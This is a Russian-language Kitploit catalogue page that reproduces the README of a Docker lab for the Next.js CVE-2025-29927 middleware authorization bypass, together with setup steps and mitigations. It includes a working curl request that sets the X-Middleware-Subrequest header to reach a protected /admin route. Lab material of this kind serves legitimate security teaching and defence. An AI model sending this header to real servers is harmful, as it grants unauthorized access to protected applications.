Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
NextJS-CVE-2025-29927-Docker-Lab — Лаборатория на базе Docker для изучения и воспроизведения уязвимости обхода авторизации промежуточного ПО Next.js CVE-2025-29927. Включает уязвимое приложение, шаги для воспроизведения и стратегии смягчения последствий для образовательных исследований в области безопасности. | Kitploit
Инструменты/GitHubGitHub/enochgitgamefied/nextjs-cve-2025-29927-docker-lab
Аутентификация и авторизацияАнализ уязвимостейЭксплуатация веб-приложенийНеправильная КонфигурацияОбучение и ОбразованиеЛаборатории и Практика
GitHubenochgitgamefied/nextjs-cve-2025-29927-docker-lab

NextJS-CVE-2025-29927-Docker-Lab

Лаборатория на базе Docker для изучения и воспроизведения уязвимости обхода авторизации промежуточного ПО Next.js CVE-2025-29927. Включает уязвимое приложение, шаги для воспроизведения и стратегии смягчения последствий для образовательных исследований в области безопасности.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
57 месяцев назадЕщё не проверено

🚨 NextJS-CVE-2025-29927-Docker-Lab

Этот репозиторий содержит среду лаборатории на основе Docker для изучения и демонстрации уязвимости Next.js CVE-2025-29927 в контролируемых условиях.

⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Эта лаборатория предназначена только для образовательных целей и исследований в области безопасности. Не выставляйте её в открытый интернет и не используйте в продакшене.


📦 Возможности

  • ✅ Уязвимое приложение Next.js
  • ✅ Контейнеризовано с помощью Docker
  • ✅ Предназначено для локального тестирования CVE-2025-29927
  • ✅ Включает предварительно настроенные маршруты и интерфейс
  • ✅ Легко настроить и запустить

🛠 Предварительные требования

Убедитесь, что у вас установлено следующее:

  • Docker (v20+)
  • Git
  • Опционально: Node.js если планируете запускать вне Docker

🚀 Начало работы

Выполните следующие шаги, чтобы клонировать и запустить лабораторию:

1. Клонировать репозиторий

root@kitploit:~
git clone https://github.com/enochgitgamefied/NextJS-CVE-2025-29927-Docker-Lab.git
cd NextJS-CVE-2025-29927-Docker-Lab

2. Собрать и запустить с помощью Docker

root@kitploit:~
docker-compose up --build

Это сделает следующее:

  • Соберёт образ Docker
  • Запустит уязвимый сервер Next.js
  • Предоставит доступ к приложению по адресу http://localhost:3000

📂 Структура папок

root@kitploit:~
.
├── app/                     # Main Next.js app code
├── public/                  # Static assets (images, etc.)
├── Dockerfile               # Docker setup for app
├── docker-compose.yml       # Compose configuration
├── .env                     # Environment variables (if any)
├── README.md                # You are here

🧪 Тестирование уязвимости

🛡️ CVE-2025-29927 - Обход авторизации в промежуточном ПО Next.js

⚠️ ПРЕДУПРЕЖДЕНИЕ: Эта документация предназначена только для образовательных целей и исследований в области безопасности. Не развёртывайте уязвимое приложение в производственной среде.


🔍 Обзор

CVE-2025-29927 — это критическая уязвимость обхода авторизации в промежуточном ПО Next.js. Она позволяет злоумышленникам пропускать аутентификацию на основе промежуточного ПО и получать доступ к защищённым маршрутам, манипулируя заголовком X-Middleware-Subrequest.


🧪 Воспроизведение уязвимости

1. Доступ к защищённым маршрутам без аутентификации

Попробуйте получить доступ к защищённому маршруту, например /admin, без какой-либо аутентификации:

root@kitploit:~
curl http://localhost:3000/admin

Ожидаемое поведение: Доступ запрещён или выполняется перенаправление на страницу без авторизации.

Уязвимое поведение: Доступ предоставляется без аутентификации.

2. Обход промежуточного ПО с помощью заголовка X-Middleware-Subrequest

Отправьте запрос с заголовком X-Middleware-Subrequest, чтобы обойти проверки промежуточного ПО:

root@kitploit:~
curl -H "X-Middleware-Subrequest: src/middleware:nowaf" http://localhost:3000/admin

Результат: Промежуточное ПО обходится, и доступ к защищённому маршруту предоставляется.


🛡️ Стратегии смягчения

1. Обновить Next.js до исправленной версии

Обновите Next.js до одной из следующих версий, в которых устранена уязвимость:

  • 14.2.25
  • 15.2.3
root@kitploit:~
npm install next@latest

2. Реализовать усиление промежуточного ПО

Улучшите ваше промежуточное ПО, чтобы правильно проверять запросы и отклонять любые с подозрительными заголовками:

root@kitploit:~
import { NextResponse } from 'next/server';

export function middleware(request) {
  const subrequestHeader = request.headers.get('x-middleware-subrequest');
  if (subrequestHeader) {
    return new NextResponse('Unauthorized', { status: 401 });
  }
  // Continue with normal processing
  return NextResponse.next();
}

3. Настроить обратный прокси для удаления подозрительных заголовков

Если вы используете обратный прокси (например, Nginx), настройте его на удаление заголовка X-Middleware-Subrequest из входящих запросов:

root@kitploit:~
location / {
  proxy_pass http://localhost:3000;
  proxy_set_header X-Middleware-Subrequest "";
}

📚 Ссылки

  • NVD - CVE-2025-29927
  • Datadog Security Labs Analysis
  • Vercel Postmortem

Этот файл VULNERABILITY.md предоставляет подробное руководство по пониманию и воспроизведению уязвимости CVE-2025-29927 в контролируемой среде. Он также предлагает практические стратегии смягчения для защиты ваших приложений Next.js от таких эксплойтов.

Для детальной демонстрации и дальнейшего понимания этой уязвимости вы можете обратиться к полной демонстрации атаки, предоставленной Techtalkpine в сообщении блога, которое также содержит ссылку на живую демонстрацию на YouTube: https://techtalkpine.com/2025/03/demo-for-cve-2025-29927-nextjs/

Дайте мне знать, если вам потребуется помощь с какой-либо частью этой настройки или дальнейшие разъяснения по шагам смягчения.


🧹 Завершение работы

Чтобы остановить и удалить контейнеры:

root@kitploit:~
docker-compose down

📚 Ресурсы

  • Документация Next.js
  • Документация Docker
  • OWASP Top 10

⚠️ Юридическое предупреждение

Этот проект предназначен исключительно для образовательных и исследовательских целей. Вы несёте ответственность за его использование в соответствии со всеми применимыми законами и этическими нормами. Автор не несёт ответственности за любое неправомерное использование или причинённый ущерб.

Скачать инструмент